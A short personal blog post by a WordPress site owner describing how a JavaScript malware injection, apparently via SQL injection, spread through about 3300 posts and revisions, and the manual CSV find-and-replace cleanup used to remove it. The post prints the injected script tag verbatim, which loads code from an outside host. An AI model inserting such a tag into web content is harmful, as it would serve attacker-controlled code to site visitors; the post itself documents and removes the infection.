Well, that was exciting. Apparently my website had been attached by some kind of SQL injection. I was curious if my self-hosted WordPress website had been attacked like 4,300 others. After some digging around, I found that this was not the case. A scan by UnmaskParasites.com revealed nothing unusual. However, a scan by Sucuri’s SiteCheck revealed some Javascript malware entries in some posts.
I say “some” posts. By this I mean 3300 posts and post revisions dating back to the very first blog entry on this website going to as recently as July 13, 2011. Not including this post, I’ve got 721 published blog entries – with almost all containing this little gem:
<script type=”text/javascript” src=”http://jsss.ce.ms/16″></script><script type=”text/javascript” src=”http://jsss.ce.ms/16″></script>
Here’s what I did to clean this infection:
- Copy my entire “_posts” to “_posts2”
- Copy my entire “_posts” to “_posts3”
- Downloaded “_posts3” as a CSV
- Find and replace all instances of the above script in the CSV with “”
- Deleted the contents of “_posts3”
- Uploaded the altered CSV into “_posts3”
- Renamed “_posts” to “_posts1” and “_posts3” to “_posts”
- Done!
It’s definitely possible to create a little WordPress plugin to clean this kind of an infection out, but there’s little incentive to do so when the manual fix is relatively easy. If you’ve got this kind of an infection in your site and don’t know how to take care of it, drop me a line.